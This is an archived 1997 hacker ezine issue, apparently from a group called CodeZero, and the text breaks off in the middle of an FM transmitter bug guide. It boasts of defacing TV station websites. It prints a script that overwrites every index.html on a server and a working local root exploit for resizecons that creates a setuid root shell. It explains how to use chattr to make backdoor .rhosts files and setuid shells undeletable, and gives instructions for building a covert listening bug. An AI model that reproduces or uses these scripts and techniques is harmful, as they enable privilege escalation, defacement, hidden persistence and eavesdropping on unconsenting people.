💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › CRH › crh005.tx… captured on 2021-12-03 at 14:04:38.

View Raw

More Information

-=-=-=-=-=-=-

�������������������������������������������������������������������������������
                             .oO The CodeZero Oo.
                             .oO   Presents   Oo.
�������������������������������������������������������������������������������

 Welcome to issue 5 of..

       /IIIIIIIIII          /IIIIIIIIII           /III   /III
       \ III_____/          \ III___/III          \ III  \ III
        \ III                \ III  \ III          \ III  \_III
         \ III  onfidence     \ IIIIIIII  emains    \ IIIIIIIIII  igh
          \ III                \ III__/III           \ III__/ III
           \ III                \ III  \ III          \ III  \ III
            \ IIIIIIIIII   ___   \ III  \ III   ___    \ III  \ III   ___
             \_________/  /\__\   \__/   \__/  /\__\    \__/   \__/  /\__\
                          \/__/                \/__/                 \/__/

                                                         ...23rd October 1997
�������������������������������������������������������������������������������

                  Team CodeZero, we rule your weak network.

�������������������������������������������������������������������������������

                   .-----------[ An Official ]-----------.
                   :      .-----.  .----.   .--.--.      :
                   :      :  .--'  : .-. :  :  :  :      :
                   !_-::  :  :     : `-' ;  :  .  :  ::-_!
                   :~-::  :: :     :: . :   ::    :  ::-~:
                   :      ::.`--.  ::.:  :  ::.:  :      :
                   :      `-----'  `--'--'  `--'--'      :
                   !_-::                             ::-_!
                   :~-::-[ Confidence Remains High ]-::-~:
                   :~-::                             ::-~:
                   `-----------[ Production ]------------'

�������������������������������������������������������������������������������
  In This "2500 lined (count 'em -- so1o)" Issue :
�������������������������������������������������������������������������������

 -----=>  Section A  :  Introduction And Cover Story.

 1. Confidence Remains High issue 5....................: Tetsu Khan
 2. 0wning TV stations is cool.........................: so1o

 -----=>  Section B  :  Exploits And Code.

 1. Gerbil.c...........................................: TFreak (mods by Shok)
 2. Replaceit.sh.......................................: Shok / so1o
 3. Security.sh........................................: Berkeley
 4. Wozzeck.sh.........................................: Dave M.
 5. Chattr tekneeq.....................................: xFli

 -----=>  Section C  :  Phones / Scanning / Radio.

 1. 617 dialups........................................: zer0x
 2. FM radio bugs......................................: xFli

 -----=>  Section D  :  Miscellaneous.

 1. AT&T and Intel assembly syntax.....................: Shok
 2. sIn inf0z..........................................: so1o
 3. Wassup with NT?!...................................: Crystalize
 4. More #hebrew.......................................: so1o
 5. Linking to /dev/zero...............................: xFli
 6. Creating a crypto-worm (philosophy)................: Shok

 -----=>  Section E  :  World News (nothings happened this month)

 ------=> Section F  :  Projects.

 1. TOTALCON '98...................................: so1o
 2. Security / Monitoring tools....................: Shok
 3. PornBot........................................: TFreak

 -----=> Section G  :  The End. (+ Personal Column)

�������������������������������������������������������������������������������
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
�������������������������������������������������������������������������������
  1. Confidence Remains High issue 5 : Tetsu Khan
�������������������������������������������������������������������������������

Yet another issue of Confidence Remains High! Only 15 more to go until the
1/1/00..In this crh005.zip we have included TFreak's pornbot, johan's awaited
sirc4 code, and xFli's FM transmitter schematics, we all hope you enjoy reading
this issue of Confidence Remains High, I definately think its our best issue
yet..Distro sites are messed up, I'm gonna have to get our new permenant
domain as soon as I can. Until issue 6, enjoy!

The distro list..
=================

   www.technotronic.com                             /ezines/crh/
   ftp.linuxwarez.com                               /pub/crh/

�������������������������������������������������������������������������������
  2. 0wning TV stations is cool : so1o
�������������������������������������������������������������������������������

As you may well know, we took control of 2 television stations web servers in
the Fort ... area, some of my friends live in the immediate area, and the hack
was on the morning news, it was cool, we were on TV!@#~

It is currently on videotape, we will be getting it into an .avi or .mpg asap,
then you can phear our elite tv tekneeq, until then, here's an acsii
representation of the sites exploited (also check out www.hacked.net) :

------------------------------------------------------------------------------
                     [ wE oWN yOUR aIRWAVES!!!@~#~!~@ ]
------------------------------------------------------------------------------

                 [ w3lc0m3 t0 th3 c0d3z3r0 ph34r n4t10n!@# ]

------------------------------------------------------------------------------
         You know the deal, we 0wn your sites, make you look stupid,
        you try to catch us, but you don't know who, or where we are,
     we are just ghosts, ghosts your machines, you should learn to phear.
------------------------------------------------------------------------------

                        And tonight on CodeZero tV...
                        -----------------------------

                        An Introduction To RealDoll

                       Bill Gates Exclusive Interview

                      Why Not Websearch For "codezero" ?

------------------------------------------------------------------------------

            0wned (0'wn3d) The act of showing how fucking dumb a
                           sysadmin can be. See sekurity.
   
�������������������������������������������������������������������������������
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
�������������������������������������������������������������������������������
  1. Gerbil.c : TFreak (modified by Shok)
�������������������������������������������������������������������������������

/*
 *  gerbil.c by TFreak [1.1 - 08/06/1997]
 *  This is an encryption program....
 *
 *  Few modifications by Shok.....
 *  Modified by Shok to allow you to output the encrypted file to a
 *  different file other than the original (this original version by
 *  TFreak overwrote the file)
 *
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <unistd.h>
#include <termios.h>

#define BSIZE 1024
#define ERROR -1

char *OutputFile;
void getkey (char *);
void setTerm (int); 
void sighandler (void);

void main (int argc, char **argv)
{
    int fd, fd1, i, len, cycle = 0;
    long filesize, oldoffset;
    char key[BSIZE], plain, enc;
        
    if (argc < 3) {
        fprintf(stderr, "usage: %s <input filename> <output filename>\n", argv[0]);
        exit(ERROR);
    } 
    
    OutputFile = argv[2];
    /*  open our file, grab errors */
    if ((fd = open(argv[1], O_RDONLY)) == ERROR) {
        perror("opening input file for reading");
        exit(ERROR);
    }
    
    if ((fd1 = open(argv[2], O_CREAT|O_WRONLY, S_IREAD|S_IWRITE)) == ERROR) {
       perror("opening output file for writing");
       exit(ERROR);
    }
  
    /* get our key that were going to be using */
    setTerm(0);
    getkey(&key[0]);
    setTerm(1);
    
    putchar('\n');
    printf("Encrypting %s to %s....\nPlease wait.\n", argv[1], argv[2]);

    /* ignore Ctrl-C after we got key */
    signal(SIGINT, (void *)sighandler);
    signal(SIGKILL, (void *)sighandler);

    /* get the size of the file we're working with */
    if ((filesize = lseek(fd, 0L, SEEK_END)) == ERROR) {
        perror("reading file");
        close(fd);
        exit(ERROR);
    }
    for (len = 0; len < strlen(key); len++) {
        oldoffset = lseek(fd, 0L, SEEK_SET);
        cycle = len;
        for (i = 0; i < filesize; i++, cycle++) {
            oldoffset = lseek(fd, 0, SEEK_CUR);
            if (read(fd, &plain, 1) == ERROR) {
                perror("reading file");
                close(fd);
                exit(ERROR);
            }
    	    if (key[cycle] == '\0') cycle = 0;
            enc = ~plain ^ key[cycle]; 
            lseek(fd1, oldoffset,  SEEK_SET);
            if (write(fd1, &enc, 1) == ERROR) {
                perror("writing to file");
                close(fd);
                exit(ERROR);
            } 
        }
    } 
    puts("");
}

void getkey (char *ptrkey)
{
    char key2[BSIZE/2], salt[3]; 

    /* set a timer so we dont loop forever */
    alarm(60);

    while (1) {
        printf("Key: ");
        fgets(ptrkey, BSIZE/2, stdin); 
        if (ptrkey[0] == '\n') continue;
        if (strlen(ptrkey) < 2) {
            fprintf(stderr, "\nKey must be at least 2 characters\n");
            continue;
        }
        printf("\nAgain: ");
        fgets(key2, BSIZE/2, stdin);
        if ((strcmp(ptrkey, key2)) == 0) break;
        else fprintf(stderr, "\nKeys do not match\n"); 
    }    
    salt[0] = ptrkey[1]; salt[1] = ptrkey[0]; salt[2] = '\0';
    strcat(ptrkey, crypt(salt, ptrkey));
    salt[0] = ptrkey[0]; salt[1] = ptrkey[1]; salt[2] = '\0';
    strcat(ptrkey, crypt(salt, ptrkey));
    alarm(0);
}

void setTerm (int mode)
{
    static struct termios old, new;
 
    if (mode == 0) {
        tcgetattr(fileno(stdin), &old);
        memcpy(&new, &old, sizeof(struct termios));
        new.c_lflag &= ~(ICANON|ECHO);
        tcsetattr(fileno(stdin), TCSANOW, &new);
    } else tcsetattr(fileno(stdin), TCSANOW, &old); 
}

void sighandler()
{
printf("\nReceive abort.......exiting now.\n");
printf("Output file was NOT saved.\n");
unlink(OutputFile);
exit(1);
}
        
�������������������������������������������������������������������������������
  2. Replaceit.sh : Shok / so1o
�������������������������������������������������������������������������������

Replaces ALL index.html files on the system with the one you specify as
the second argument. Obviously this is useful on a large webhosting site
;)

#!/bin/sh
# This isn't really a script but ya know that's life...
# This was just made to make life a little easier -- 
#
# Use with -- sh replaceit.sh <thefile.html>

if [ $1 == "" ]
then
echo "Usage: replaceit.sh <file>"
echo "This will replace every index.html on the system with <file>"
else
find / -name "index.html" -print -exec cp -f $1 {} \; 2>/dev/null &
echo "Okay it's running in the background...enjoy :)"
fi

�������������������������������������������������������������������������������
  3. Security.sh : Berkeley
�������������������������������������������������������������������������������

#!/bin/sh -
#
#       @(#)security    8.1 (Berkeley) 6/9/93
#

PATH=/sbin:/usr/sbin:/bin:/usr/bin

umask 077

ERR=/tmp/_secure1.$
TMP1=/tmp/_secure2.$
TMP2=/tmp/_secure3.$
TMP3=/tmp/_secure4.$
LIST=/tmp/_secure5.$
OUTPUT=/tmp/_secure6.$

trap 'rm -f $ERR $TMP1 $TMP2 $TMP3 $LIST $OUTPUT' 0

# Check the master password file syntax.
MP=/etc/master.passwd
awk -F: '{
        if ($0 ~ /^[     ]*$/) {
                printf("Line %d is a blank line.\n", NR);
                next;
        }
        if (NF != 10)
                printf("Line %d has the wrong number of fields.\n", NR);
        if ($1 !~ /^[A-Za-z0-9]*$/)
                printf("Login %s has non-alphanumeric characters.\n", $1);
        if (length($1) > 16)
                printf("Login %s has more than 16 characters.\n", $1);
        if ($2 == "")
                printf("Login %s has no password.\n", $1);
        if (length($2) != 13 && length($2) != 20 && \
            ($10 ~ /.*sh$/ || $10 == ""))
                printf("Login %s is off but still has a valid shell.\n", $1);
        if ($3 == 0 && $1 != "root" && $1 != "toor")
                printf("Login %s has a user id of 0.\n", $1);
        if ($3 < 0)
                printf("Login %s has a negative user id.\n", $1);
        if ($4 < 0)
                printf("Login %s has a negative group id.\n", $1);
}' < $MP > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking the $MP file:\n"
        cat $OUTPUT
fi

awk -F: '{ print $1 }' $MP | sort | uniq -d > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\n$MP has duplicate user names.\n"
        column $OUTPUT
fi

awk -F: '{ if ($1 != "toor") print $1 " " $3 }' $MP | sort -n +1 | tee $TMP1 |
uniq -d -f 1 | awk '{ print $2 }' > $TMP2
if [ -s $TMP2 ] ; then
        printf "\n$MP has duplicate user id's.\n"
        while read uid; do
                grep -w $uid $TMP1
        done < $TMP2 | column
fi

# Backup the master password file; a special case, the normal backup
# mechanisms also print out file differences and we don't want to do
# that because this file has encrypted passwords in it.
CUR=/var/backups/`basename $MP`.current
BACK=/var/backups/`basename $MP`.backup
if [ -s $CUR ] ; then
        if cmp -s $CUR $MP; then
                :
        else
                cp -p $CUR $BACK
                cp -p $MP $CUR
                chown root.wheel $CUR
        fi
else
        cp -p $MP $CUR
        chown root.wheel $CUR
fi

# Check the group file syntax.
GRP=/etc/group
awk -F: '{
        if ($0 ~ /^[     ]*$/) {
                printf("Line %d is a blank line.\n", NR);
                next;
        }
        if (NF != 4)
                printf("Line %d has the wrong number of fields.\n", NR);
        if ($1 !~ /^[A-za-z0-9]*$/)
                printf("Group %s has non-alphanumeric characters.\n", $1);
        if (length($1) > 8)
                printf("Group %s has more than 8 characters.\n", $1);
        if ($3 !~ /[0-9]*/)
                printf("Login %s has a negative group id.\n", $1);
}' < $GRP > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking the $GRP file:\n"
        cat $OUTPUT
fi

awk -F: '{ print $1 }' $GRP | sort | uniq -d > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\n$GRP has duplicate group names.\n"
        column $OUTPUT
fi

# Check for root paths, umask values in startup files.
# The check for the root paths is problematical -- it's likely to fail
# in other environments.  Once the shells have been modified to warn
# of '.' in the path, the path tests should go away.
> $TMP1
> $OUTPUT
rhome=/root
umaskset=no
list="/etc/csh.cshrc /etc/csh.login ${rhome}/.cshrc ${rhome}/.login"
for i in $list ; do
        if [ -f $i ] ; then
                if egrep umask $i > /dev/null ; then
                        umaskset=yes
                fi
                egrep umask $i |
                awk '$2 % 100 < 20 \
                        { print "Root umask is group writeable" }
                     $2 % 10 < 2 \
                        { print "Root umask is other writeable" }' >> $OUTPUT
                /bin/csh -f -s << end-of-csh > /dev/null 2>&1
                        unset path
                        source $i
                        /bin/ls -ldgT \$path > $TMP1
end-of-csh
                awk '{
                        if ($10 ~ /^\.$/) {
                                print "The root path includes .";
                                next;
                        }
                     }
                     $1 ~ /^d....w/ \
        { print "Root path directory " $10 " is group writeable." } \
                     $1 ~ /^d.......w/ \
        { print "Root path directory " $10 " is other writeable." }' \
                < $TMP1 >> $OUTPUT
        fi
done
if [ $umaskset = "no" -o -s $OUTPUT ] ; then
        printf "\nChecking root csh paths, umask values:\n$list\n"
        if [ -s $OUTPUT ]; then
                cat $OUTPUT
        fi
        if [ $umaskset = "no" ] ; then
                printf "\nRoot csh startup files do not set the umask.\n"
        fi
fi

> $OUTPUT
rhome=/root
umaskset=no
list="${rhome}/.profile"
for i in $list; do
        if [ -f $i ] ; then
                if egrep umask $i > /dev/null ; then
                        umaskset=yes
                fi
                egrep umask $i |
                awk '$2 % 100 < 20 \
                        { print "Root umask is group writeable" } \
                     $2 % 10 < 2 \
                        { print "Root umask is other writeable" }' >> $OUTPUT
                /bin/sh << end-of-sh > /dev/null 2>&1
                        PATH=
                        . $i
                        list=\`echo \$PATH | /usr/bin/sed -e 's/:/ /g'\`
                        /bin/ls -ldgT \$list > $TMP1
end-of-sh
                awk '{
                        if ($10 ~ /^\.$/) {
                                print "The root path includes .";
                                next;
                        }
                     }
                     $1 ~ /^d....w/ \
        { print "Root path directory " $10 " is group writeable." } \
                     $1 ~ /^d.......w/ \
        { print "Root path directory " $10 " is other writeable." }' \
                < $TMP1 >> $OUTPUT

        fi
done
if [ $umaskset = "no" -o -s $OUTPUT ] ; then
        printf "\nChecking root sh paths, umask values:\n$list\n"
        if [ -s $OUTPUT ]; then
                cat $OUTPUT
        fi
        if [ $umaskset = "no" ] ; then
                printf "\nRoot sh startup files do not set the umask.\n"
        fi
fi

# Root and uucp should both be in /etc/ftpusers.
if egrep root /etc/ftpusers > /dev/null ; then
        :
else
        printf "\nRoot not listed in /etc/ftpusers file.\n"
fi
if egrep uucp /etc/ftpusers > /dev/null ; then
        :
else
        printf "\nUucp not listed in /etc/ftpusers file.\n"
fi

# Uudecode should not be in the /etc/aliases file.
if egrep 'uudecode:.*\||decode:.*\|' /etc/aliases; then
        printf "\nProgram entry for uudecode exists in the /etc/aliases file.\n"
fi

# Files that should not have + signs.
list="/etc/hosts.equiv /etc/hosts.lpd"
for f in $list ; do
        if egrep '\+' $f > /dev/null ; then
                printf "\nPlus sign in $f file.\n"
        fi
done

# Check for special users with .rhosts files.  Only root and toor should
# have a .rhosts files.  Also, .rhosts files should not have plus signs.
awk -F: '$1 != "root" && $1 != "toor" && \
        ($3 < 100 || $1 == "ftp" || $1 == "uucp") \
                { print $1 " " $6 }' /etc/passwd |
while read uid homedir; do
        if [ -f ${homedir}/.rhosts ] ; then
                rhost=`ls -ldgT ${homedir}/.rhosts`
                printf "$uid: $rhost\n"
        fi
done > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking for special users with .rhosts files:\n"
        cat $OUTPUT
fi

awk -F: '{ print $1 " " $6 }' /etc/passwd | \
while read uid homedir; do
        if [ -f ${homedir}/.rhosts ] && \
            egrep '\+' ${homedir}/.rhosts > /dev/null 2>&1; then
                printf "$uid: + in .rhosts file.\n"
        fi
done > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking .rhosts files syntax:\n"
        cat $OUTPUT
fi

# Check home directories.  Directories should not be owned by someone else
# or writeable.
awk -F: '{ print $1 " " $6 }' /etc/passwd | \
while read uid homedir; do
        if [ -d ${homedir}/ ] ; then
                file=`ls -ldgT ${homedir}`
                printf "$uid $file\n"
        fi
done |
awk '$1 != $4 && $4 != "root" \
        { print "user " $1 " home directory is owned by " $4 }
     $2 ~ /^-....w/ \
        { print "user " $1 " home directory is group writeable" }
     $2 ~ /^-.......w/ \
        { print "user " $1 " home directory is other writeable" }' > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking home directories:\n"
        cat $OUTPUT
fi

# Files that should not be owned by someone else or readable.
list=".netrc .rhosts"
awk -F: '{ print $1 " " $6 }' /etc/passwd | \
while read uid homedir; do
        for f in $list ; do
                file=${homedir}/${f}
                if [ -f $file ] ; then
                        printf "$uid $f `ls -ldgT $file`\n"
                fi
        done
done |
awk '$1 != $5 && $5 != "root" \
        { print "user " $1 " " $2 " file is owned by " $5 }
     $3 ~ /^-...r/ \
        { print "user " $1 " " $2 " file is group readable" }
     $3 ~ /^-......r/ \
        { print "user " $1 " " $2 " file is other readable" }
     $3 ~ /^-....w/ \
        { print "user " $1 " " $2 " file is group writeable" }
     $3 ~ /^-.......w/ \
        { print "user " $1 " " $2 " file is other writeable" }' > $OUTPUT

# Files that should not be owned by someone else or writeable.
list=".bashrc .cshrc .emacs .emacsrc .exrc .forward .klogin .login \
      .logout .profile .tcshrc"
awk -F: '{ print $1 " " $6 }' /etc/passwd | \
while read uid homedir; do
        for f in $list ; do
                file=${homedir}/${f}
                if [ -f $file ] ; then
                        printf "$uid $f `ls -ldgT $file`\n"
                fi
        done
done |
awk '$1 != $5 && $5 != "root" \
        { print "user " $1 " " $2 " file is owned by " $5 }
     $3 ~ /^-....w/ \
        { print "user " $1 " " $2 " file is group writeable" }
     $3 ~ /^-.......w/ \
        { print "user " $1 " " $2 " file is other writeable" }' >> $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking dot files:\n"
        cat $OUTPUT
fi

# Mailboxes should be owned by user and unreadable.
ls -l /var/mail | sed 1d | \
awk '$3 != $9 && $9 != "."$3".pop"\
        { print "user " $9 " mailbox is owned by " $3 }
     $1 != "-rw-------" \
        { print "user " $9 " mailbox is " $1 ", group " $4 }' > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking mailbox ownership:\n"
        cat $OUTPUT
fi

# File systems should not be globally exported.
if [ -s /etc/exports ] ; then
        awk '{
                readonly = 0;
                for (i = 2; i <= NF; ++i) {
                        if ($i ~ /-ro/)
                                readonly = 1;
                        else if ($i !~ /^-/)
                                next;
                }
                if (readonly)
                        print "File system " $1 " globally exported, read-only."
                else
                        print "File system " $1 " globally exported, read-write."
        }' < /etc/exports > $OUTPUT
        if [ -s $OUTPUT ] ; then
                printf "\nChecking for globally exported file systems:\n"
                cat $OUTPUT
        fi
fi

# Display any changes in setuid files and devices.
printf "\nChecking setuid files and devices:\n"
(find / ! -fstype local -a -prune -o \
    \( -perm -u+s -o -perm -g+s -o ! -type d -a ! -type f -a ! -type l -a \
       ! -type s \) | \
sort | sed -e 's/^/ls -ldgT /' | sh > $LIST) 2> $OUTPUT

# Display any errors that occurred during system file walk.
if [ -s $OUTPUT ] ; then
        printf "Setuid/device find errors:\n"
        cat $OUTPUT
        printf "\n"
fi

# Display any changes in the setuid file list.
egrep -v '^[bc]' $LIST > $TMP1
if [ -s $TMP1 ] ; then
        # Check to make sure uudecode isn't setuid.
        if grep -w uudecode $TMP1 > /dev/null ; then
                printf "\nUudecode is setuid.\n"
        fi

        CUR=/var/backups/setuid.current
        BACK=/var/backups/setuid.backup

        if [ -s $CUR ] ; then
                if cmp -s $CUR $TMP1 ; then
                        :
                else
                        > $TMP2
                        join -110 -210 -v2 $CUR $TMP1 > $OUTPUT
                        if [ -s $OUTPUT ] ; then
                                printf "Setuid additions:\n"
                                tee -a $TMP2 < $OUTPUT
                                printf "\n"
                        fi

                        join -110 -210 -v1 $CUR $TMP1 > $OUTPUT
                        if [ -s $OUTPUT ] ; then
                                printf "Setuid deletions:\n"
                                tee -a $TMP2 < $OUTPUT
                                printf "\n"
                        fi

                        sort +9 $TMP2 $CUR $TMP1 | \
                            sed -e 's/[  ][      ]*/ /g' | uniq -u > $OUTPUT
                        if [ -s $OUTPUT ] ; then
                                printf "Setuid changes:\n"
                                column -t $OUTPUT
                                printf "\n"
                        fi

                        cp $CUR $BACK
                        cp $TMP1 $CUR
                fi
        else
                printf "Setuid additions:\n"
                column -t $TMP1
                printf "\n"
                cp $TMP1 $CUR
        fi
fi

# Check for block and character disk devices that are readable or writeable
# or not owned by root.operator.
>$TMP1
DISKLIST="dk hd hk hp jb kra ra rb rd rl rx rz sd up wd"
for i in $DISKLIST; do
        egrep "^b.*/${i}[0-9][0-9]*[a-h]$"  $LIST >> $TMP1
        egrep "^c.*/r${i}[0-9][0-9]*[a-h]$"  $LIST >> $TMP1
done

awk '$3 != "root" || $4 != "operator" || $1 !~ /.rw-r-----/ \
        { printf("Disk %s is user %s, group %s, permissions %s.\n", \
            $10, $3, $4, $1); }' < $TMP1 > $OUTPUT
if [ -s $OUTPUT ] ; then
        printf "\nChecking disk ownership and permissions:\n"
        cat $OUTPUT
        printf "\n"
fi

# Display any changes in the device file list.
egrep '^[bc]' $LIST | sort +9 > $TMP1
if [ -s $TMP1 ] ; then
        CUR=/var/backups/device.current
        BACK=/var/backups/device.backup

        if [ -s $CUR ] ; then
                if cmp -s $CUR $TMP1 ; then
                        :
                else
                        > $TMP2
                        join -110 -210 -v2 $CUR $TMP1 > $OUTPUT
                        if [ -s $OUTPUT ] ; then
                                printf "Device additions:\n"
                                tee -a $TMP2 < $OUTPUT
                                printf "\n"
                        fi

                        join -110 -210 -v1 $CUR $TMP1 > $OUTPUT
                        if [ -s $OUTPUT ] ; then
                                printf "Device deletions:\n"
                                tee -a $TMP2 < $OUTPUT
                                printf "\n"
                        fi

                        # Report any block device change.  Ignore character
                        # devices, only the name is significant.
                        cat $TMP2 $CUR $TMP1 | \
                        sed -e '/^c/d' | \
                        sort +9 | \
                        sed -e 's/[      ][      ]*/ /g' | \
                        uniq -u > $OUTPUT
                        if [ -s $OUTPUT ] ; then
                                printf "Block device changes:\n"
                                column -t $OUTPUT
                                printf "\n"
                        fi

                        cp $CUR $BACK
                        cp $TMP1 $CUR
                fi
        else
                printf "Device additions:\n"
                column -t $TMP1
                printf "\n"
                cp $TMP1 $CUR
        fi
fi

# Check special files.
# Check system binaries.
#
# Create the mtree tree specifications using:
#
#       mtree -cx -pDIR -kcksum,gid,mode,nlink,size,link,time,uid > DIR.secure
#       chown root.wheel DIR.SECURE
#       chmod 600 DIR.SECURE
#
# Note, this is not complete protection against Trojan horsed binaries, as
# the hacker can modify the tree specification to match the replaced binary.
# For details on really protecting yourself against modified binaries, see
# the mtree(8) manual page.
if cd /etc/mtree; then
        mtree -e -p / -f /etc/mtree/special > $OUTPUT
        if [ -s $OUTPUT ] ; then
                printf "\nChecking special files and directories:\n"
                cat $OUTPUT
        fi

        > $OUTPUT
        for file in *.secure; do
                tree=`sed -n -e '3s/.* //p' -e 3q $file 2>/dev/null`
                mtree -f $file -p $tree > $TMP1 2>/dev/null
                if [ -s $TMP1 ]; then
                        printf "\nChecking $tree:\n" >> $OUTPUT
                        cat $TMP1 >> $OUTPUT
                fi
        done
        if [ -s $OUTPUT ] ; then
                printf "\nChecking system binaries:\n"
                cat $OUTPUT
        fi
fi

# List of files that get backed up and checked for any modifications.  Each
# file is expected to have two backups, /var/backups/file.{current,backup}.
# Any changes cause the files to rotate.
if [ -s /etc/changelist ] ; then
        for file in `cat /etc/changelist`; do
                CUR=/var/backups/`basename $file`.current
                BACK=/var/backups/`basename $file`.backup
                if [ -s $file ]; then
                        if [ -s $CUR ] ; then
                                diff $CUR $file > $OUTPUT
                                if [ -s $OUTPUT ] ; then
                printf "\n======\n%s diffs (OLD < > NEW)\n======\n" $file
                                        cat $OUTPUT
                                        cp -p $CUR $BACK
                                        cp -p $file $CUR
                                        chown root.wheel $CUR $BACK
                                fi
                        else
                                cp -p $file $CUR
                                chown root.wheel $CUR
                        fi
                fi
        done
fi

�������������������������������������������������������������������������������
  4. Wozzeck.sh : Dave M.
�������������������������������������������������������������������������������

#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu) : CMU is for g1mps - so1o
#

echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz.  Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi

�������������������������������������������������������������������������������
  5. Chattr tekneeq : xFli
�������������������������������������������������������������������������������

Heh, another short thing:

when you have made a .rhosts file on a machine, you can
set filesystem attributes to make it undeletable :]

simple really, but only any use on linux (ext2fs) 
and you have to be root to use chattr...

  bash# chattr +i <filename>

Now when anyone, even root tries to rm or change that file, he will
get an 'override mode 644?' message and then permission
denied . Of course, any admin who knows how to use chattr
can simply chattr -i <filename>, although it might not
be immediately apparent to them that this is all due
to our friend chattr :] 

(NB. you might want to use this in conjunction with Shok's
     trojan rm, incase someone finds out the trojan. It's also 
     useful for any suid shell backdoors etc..use your
     imagination!)


Another thing chattr can provide is secure deletion, where
the blocks on the disk used by the file are changed to 
zero's and written back. So if you have any files of a 
'sensitive' nature on your machine, you can use chattr
to ease your paranoia a little ...

  bash# chattr -R +s /dir

which will recursively add the secure deletion attrib to the files
in /dir

Now you can be extra sure that the data really _is_ gone if the
time comes to rm it ...

So all you admins, if you now realise why you cannot rm that suid shell
or .rhosts file, try chattr -i <filename> ;)

Of course, you all know how 'man chattr' works so you know all this
already :]

�������������������������������������������������������������������������������
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
�������������������������������������������������������������������������������
  1. 617 dialups : zer0x
�������������������������������������������������������������������������������

617 Telnet Dialups

If your not in area code 617 this may not be very usefull to you, but then
again for ultimate safety you could always use this from some telnet outdial
or whatever. I will try to put something in for other area codes in later
issues.
hello kiddies. Sometimes if you want to connect somewhere, you don't want
to go through a ppp, even if it isnt legit. Personally I think ppp's are
good if they're from a big isp because theres less chance of you being
monitored. Some very cool people offer telnet dialups, MIT is one of them.
Instead of just having ones for students they have a public one.
It is called "Terminus". When you dial any of the following Terminus
dialups:

  (617) 258-7111
  (617) 258-7115
  (617) 258-7116
  (617) 258-7126
  (617) 258-7112

When you dial up it spits some shit at you:

"Welcome to the MIT Laboratory for Computer Science.
You are connected to the dialup server: TERMINUS
Report problems to Bug-Dialup@lcs.mit.edu
Administrative questions should be directed to Dialup-Admin@lcs.mit.edu
Contact Dialup-Users-Request@lcs.mit.edu for service info and updates.
All users, especially guests, should get this info.
Guests who use the LCS dialup servers and don't follow the guidelines are
endangering the availability of dialup servers for all guests.
Guest restrictions:     ON at 60%     OFF at 50%"

And then it pops up a little telnet prompt. 

"Terminus>"

Type ? for help, or just enter the host you want to connect to.
For some hosts it now says "connection not permitted to this host".
This may be because shell providers are tired of little kiddies
like some of you connecting to hosts and rooting through it. .
Also, sometimes for some odd reason you can't connect to some hosts.
I suggest you use this in moderation. Who knows, maybe when some sysadmin
will get especially pissed he will ask MIT to set up a line trace and get
your #, or contact MIT and they will be forced to shut it down for ever.
Or even if MIT gets pissed they may start monitoring all login sessions.
So play nice, or mom my will take your dialup away.

�������������������������������������������������������������������������������
  2. FM radio bugs : xFli
�������������������������������������������������������������������������������

OK, so1o has been asking for this for ages, not to mention other
people, so I finally got round to typing it up. Basically, this
is a fairly small FM transmitter, powered by two 3 volt lithium
cells. The only slight drawback is that it requires a 170cm 
antenna if you want to get decent range out of it. This isn't 
too much of a problem though, as it is fairly easy to hide a few
feet of wire...

As for performance you can expect a range of around 500m with a
good antenna. The actual output is around 10mv, which is fine for
our, <ahem> applications :)

If you don't know what a soldering iron is or can't read circuit
diagrams, it's probably not a good idea to attempt to make this, 
as it is fairly complicated for a beginner.

 Anyway, heres the parts list:

1 - 470R 1/4 watt resistor
1 - 22k   "   "      "
1 - 47k   "   "      "
1 - 100k  "   "      "
1 - 1M    "   "      "

1 - 5p6 ceramic capacitor
1 - 27p   "        "
1 - 47p   "        "
1 - 1n    "        "
2 - 22n   "        "
1 - 100n monoblock (monolithic)

2 - BC 547 transistors

1 - electret mic insert (small == good :)

2 - 3v Lithium cells

1 - Single pole double throw (SPDT) mini slide switch

enamelled .5mm copper wire
hookup wire
shrinkwrap tubing

It is best to make a PCboard from the diagram supplied, 
as the positioning of the components is quite important.

You could also try using veroboard to make a similar
layout...

OK, most of this is fairly straightforward, but there are 
a few things you need to be careful with. 

You will need to make 2 coils with the enamelled wire.
To do this, use a match to burn the enamel off the wire
and clean off the black residue left over. 

You need something cylindrical and 2 mm in diameter as a
former for winding the coils. 

The first coil needs 8 turns of .5 mm wire, and the second
needs 5 turns. 

The second thing to remember is that the transistors _must_ 
be kept as close the the board as possible, so they dont 
stick up higher than any of the other components. The coils
should be touching the board as well. If you deviate from
the original layout a lot, there is a good chance the thing
will be very sensitive to enviromental changes, such as 
temperature or being touched. The project is not designed to
be carried around in use, although if a good casing was made
as opposed to shrinkwrap, it might become more stable. The 
